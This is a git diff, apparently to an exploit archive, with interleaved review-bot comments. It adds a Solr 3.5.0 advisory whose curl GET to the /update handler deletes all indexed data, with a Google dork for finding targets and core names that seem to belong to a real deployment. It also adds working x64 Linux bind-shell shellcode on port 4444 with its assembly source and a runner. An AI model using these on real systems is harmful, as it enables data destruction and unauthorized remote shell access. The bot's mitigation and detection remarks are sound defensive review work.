diff --git a/files.csv b/files.csv
index c4c823ec0..388f10331 100755
--- a/files.csv
+++ b/files.csv
@@ -35405,6 +35405,7 @@ id,file,description,date,author,platform,type,port
 39225,platforms/hardware/dos/39225.txt,"Apple watchOS 2 - Crash PoC",2016-01-12,"Mohammad Reza Espargham",hardware,dos,0
 39226,platforms/windows/dos/39226.py,"SNScan 1.05 - Scan Hostname/IP Field Buffer Overflow Crash PoC",2016-01-12,"Daniel Velazquez",windows,dos,0
 39227,platforms/hardware/remote/39227.txt,"FingerTec Fingerprint Reader - Remote Access and Remote Enrollment",2016-01-12,"Daniel Lawson",hardware,remote,0
+39149,platforms/lin_x86-64/shellcode/39149.c,"x64 Linux Bind TCP Port Shellcode",2016-01-01,Scorpion_,lin_x86-64,shellcode,0
 39150,platforms/php/webapps/39150.txt,"Open Audit SQL Injection Vulnerability",2016-01-02,"Rahul Pratap Singh",php,webapps,0
 39151,platforms/lin_x86-64/shellcode/39151..c,"x86_64 Linux bind TCP port shellcode",2016-01-02,Scorpion_,lin_x86-64,shellcode,0
 39152,platforms/linux/shellcode/39152..c,"TCP Bindshell with Password Prompt - 162 bytes",2016-01-02,"Sathish kumar",linux,shellcode,0
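Review bot: The added row 39149 reads as a duplicate index entry for 39151 two lines below it: same author `Scorpion_`, same platform and type, and the same title apart from capitalization (`x64 Linux Bind TCP Port Shellcode` vs `x86_64 Linux bind TCP port shellcode`), dated one day apart. If the two files hold the same shellcode the index should carry only one of them or say they are the same; if they differ, the description should carry the distinguishing detail the way the neighbouring entry does (`TCP Bindshell with Password Prompt - 162 bytes`), for example `"x64 Linux Bind TCP Port Shellcode - 103 bytes"` taken from the file's own header. I cannot tell from the index hunk alone which of the two applies.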
@@ -35659,6 +35660,7 @@ id,file,description,date,author,platform,type,port
 39415,platforms/php/webapps/39415.txt,"ATutor 2.2 - Multiple XSS Vulnerabilities",2016-02-04,"Curesec Research Team",php,webapps,80
 39416,platforms/php/webapps/39416.txt,"Symphony CMS 2.6.3 – Multiple SQL Injection Vulnerabilities",2016-02-04,"Sachin Wagh",php,webapps,80
 39417,platforms/windows/local/39417.py,"FTPShell Client 5.24 - (Create NewFolder) Local Buffer Overflow",2016-02-04,"Arash Khazaei",windows,local,0
+39418,platforms/java/webapps/39418.txt,"Solr 3.5.0 - Arbitrary Data Deletion",2016-02-08,N37,java,webapps,0
 39419,platforms/multiple/webapps/39419.txt,"dotDefender Firewall 5.00.12865 / 5.13-13282 - CSRF Vulnerability",2016-02-08,hyp3rlinx,multiple,webapps,0
 39420,platforms/php/webapps/39420.txt,"WordPress User Meta Manager Plugin 3.4.6 - Information Disclosure",2016-02-08,"Panagiotis Vagenas",php,webapps,80
 39421,platforms/php/webapps/39421.py,"WordPress WooCommerce Store Toolkit Plugin 1.5.5 - Privilege Escalation",2016-02-08,"Panagiotis Vagenas",php,webapps,80
diff --git a/platforms/java/webapps/39418.txt b/platforms/java/webapps/39418.txt
new file mode 100755
index 000000000..5d32a5c43
--- /dev/null
+++ b/platforms/java/webapps/39418.txt
@@ -0,0 +1,29 @@
+# Exploit Title: All Solr Data Can Be Delete
+# Google Dork: intext:[Schema] [Config] [Analysis] [Schema Browser]
+[Statistics] [Info] [Distribution] [Ping] [Logging]
+# Date: 5/2/2016
+# Exploit Author: N37 [Myanmar]
+# Vendor Homepage: http://lucene.apache.org/solr/
+# Software Link: https://archive.apache.org/dist/lucene/solr/3.5.0/
+# Version: 3.5.0
+# Tested on: fedora 23
+
+
+Solr is open source enterprise search platform built on Apache Lucene.
+
+It can be delete all data in solr. solr are use nlp, money of data research, data mining, some of mobile backend on vps .
+
+
+POC or Eg.
+
+This Query is shwo all data in solr :
+http://server:8080/solr/lambeth_planning/select/?q=*%3A*&version=2.2&start=0&rows=10&indent=on
+
+You can delete all data with curl in terminal :
+curl -X GET "server:8080/solr/lambeth_locations/update?stream.body=*:*<%2Fquery><%2Fdelete>&commit=true"
+
+now you can check with first query in browser. All data are deleted.
+
+
+Regards,
+N37 [Myanmar]
diff --git a/platforms/lin_x86-64/shellcode/39149.c b/platforms/lin_x86-64/shellcode/39149.c
new file mode 100755
index 000000000..70a67d3bd
--- /dev/null
+++ b/platforms/lin_x86-64/shellcode/39149.c
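Review bot: The advisory states the impact but gives neither the cause nor a mitigation, which is what someone triaging a Solr 3.5.0 deployment needs; as shown, the deletion works because the `/update` handler answers an unauthenticated GET, so a header line after `# Tested on:` such as `# Mitigation: do not expose Solr's /update handler to untrusted clients; restrict it at the network or reverse-proxy layer` would make the entry actionable. Since the request is a plain GET, detection is an access-log search for `/update?stream.body=` together with `commit=true`. The PoC URLs also use what look like a real deployment's core names (`lambeth_planning`, `lambeth_locations`) rather than a placeholder such as `<core>`; an advisory should not point at an identifiable installation. Finally, the curl line as rendered here appears to have lost some angle-bracket markup, so the stored file should be checked against the original submission.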
@@ -0,0 +1,159 @@
+/*---------------------------------------------------------------------------------------------------------------------
+ * /*
+* Author: Scorpion
+* Copyright: (c) 2016 iQube. (http://iQube.io)
+* Release Date: January 1, 2016
+*
+* Description: x64 Linux null-free TCP bind port shellcode
+* Assembled Size: 103 bytes
+* Tested On: Ubuntu 14.04 LTS
+*
+* Build/Run: gcc -fno-stack-protector -z execstack bindshell.c -o bindshell
+* ./bindshell
+* nc localhost 4444
+*
+*/
+
+/*
+* NOTE: This C code binds on port 4444
+* The end of this file contains the .nasm source code
+* The Port can be Reconfigured According to your needs
+* Instructions for changing port number
+* Port obtainer change the port value accorddingly
+* port.py
+* import socket
+* port = 444
+* hex(socket.htons(port))
+* python port.py
+* Result : 0x5c11
+* Replace the obtained value in the shellcode to change the port number
+* For building the from .nasm source use
+* nasm -felf64 filename.nasm -o filename.o
+* ld filename.o -o filename
+* To inspect for nulls
+* objdump -M intel -D filename.o
+
+
+global _start
+
+_start:
+
+ ; sock = socket(AF_INET, SOCK_STREAM, 0)
+ ; AF_INET = 2
+ ; SOCK_STREAM = 1
+ ; syscall number 41
+
+ xor rax, rax ;Xor function will null the values in the register beacuse we doesn't know whats the value in the register in realtime cases
+ xor rsi, rsi
+ mul rsi
+ push byte 0x2 ;pusing argument to the stack
+ pop rdi ; poping the argument to the rdi instructions on the top of the stack should be remove first because stack LIFO
+ inc esi ; already rsi is 0 so incrementing the rsi register will make it 1
+ push byte 0x29 ; pushing the syscall number into the rax by using stack
+ pop rax
+ syscall
+
+ ; copying the socket descripter from rax to rdi register so that we can use it further
+
+ xchg rax, rdi
+
+ ; server.sin_family = AF_INET
+ ; server.sin_port = htons(PORT)
+ ; server.sin_addr.s_addr = INADDR_ANY
+ ; bzero(&server.sin_zero, 8)
+ ; setting up 
the data sctructure
+
+ push 0x2 ;AF_INET value is 2 so we are pushing 0x2
+ mov word [rsp + 2],0x5c11 ;port 4444 htons hex value is 0x5c11 port values can be be obtained by following above instructions
+ push rsp ; saving the complete argument to rsi register
+ pop rsi
+
+
+ ; bind(sock, (struct sockaddr *)&server, sockaddr_len)
+ ; syscall number 49
+
+ push rdx ; Inserting the null to the stack
+ push byte 0x10
+ pop rdx ; value of the rdx register is set to 16 size sockaddr
+ push byte 0x31
+ pop rax ; rax register is set with 49 syscall for bind
+ syscall
+
+ ;listen the sockets for the incomming connections
+ ; listen(sock, MAX_CLIENTS)
+ ; syscall number 50
+
+ pop rsi
+ push 0x32
+ pop rax ; rax register is set to 50 syscall for listen
+ syscall
+
+ ; new = accept(sock, (struct sockaddr *)&client, &sockaddr_len)
+ ;syscall number 43
+
+ push 0x2b
+ pop rax ; rax register is set to 43 syscall for accept
+ syscall
+
+ ; storing the client socket description
+ mov r9, rax
+
+ ; close parent
+ push 0x3
+ pop rax ; closing the parent socket connection using close parent rax is set to 3 syscall to close parent
+ syscall
+
+ xchg rdi , r9
+ xor rsi , rsi
+
+ ; initilization of dup2
+ push 0x3
+ pop rsi ; setting argument to 3
+
+
+
+duplicate:
+ dec esi
+ mov al, 0x21 ;duplicate syscall applied to error,output and input using loop
+ syscall
+ jne duplicate
+
+
+execve: ; Execve format , execve("/bin/sh", 0 , 0)
+ xor rsi , rsi
+ mul rsi ; zeroed rax , rdx register
+ push ax ; terminate string with null
+ mov rbx , 0x68732f2f6e69622f ; "/bin//sh" in reverse order
+ push rbx
+ push rsp
+ pop rdi ; set RDI
+ push byte 0x3b ; execve syscall number (59)
+ pop rax
+ syscall
+
+
+*/
+
+#include
+#include
+
+unsigned char code[] = \
+"\x48\x31\xc0\x48\x31\xf6\x48\xf7\xe6\x6a\x02\x5f\xff\xc6\x6a\x29\x58\x0f\x05\x48\x97\x6a\x02\x66\xc7\x44\x24\x02"
+//Port number this value can be obtained from the above instructions
+"\x11\x5c"
+"\x54\x5e\x52\x6a\x10\x5a\x6a\x31\x58\x0f\x05\x5e\x6a\x32\x58\x0f\x05\x6a\x2b\x58\x0f\x05\x49\x89\xc1\x6a\x03\x58\x0f\x05\x49\x87\xf9\x48\x31\xf6\x6a\x03\x5e\xff\xce\xb0\x21\x0f\x05\x75\xf8\x48\x31\xf6\x48\xf7\xe6\x66\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x54\x5f\x6a\x3b\x58\x0f\x05"; + + + +main() +{ + + printf("Shellcode Length: %d\n", (int)strlen(code)); + + int (*ret)() = (int(*)())code; + + ret(); + +} + +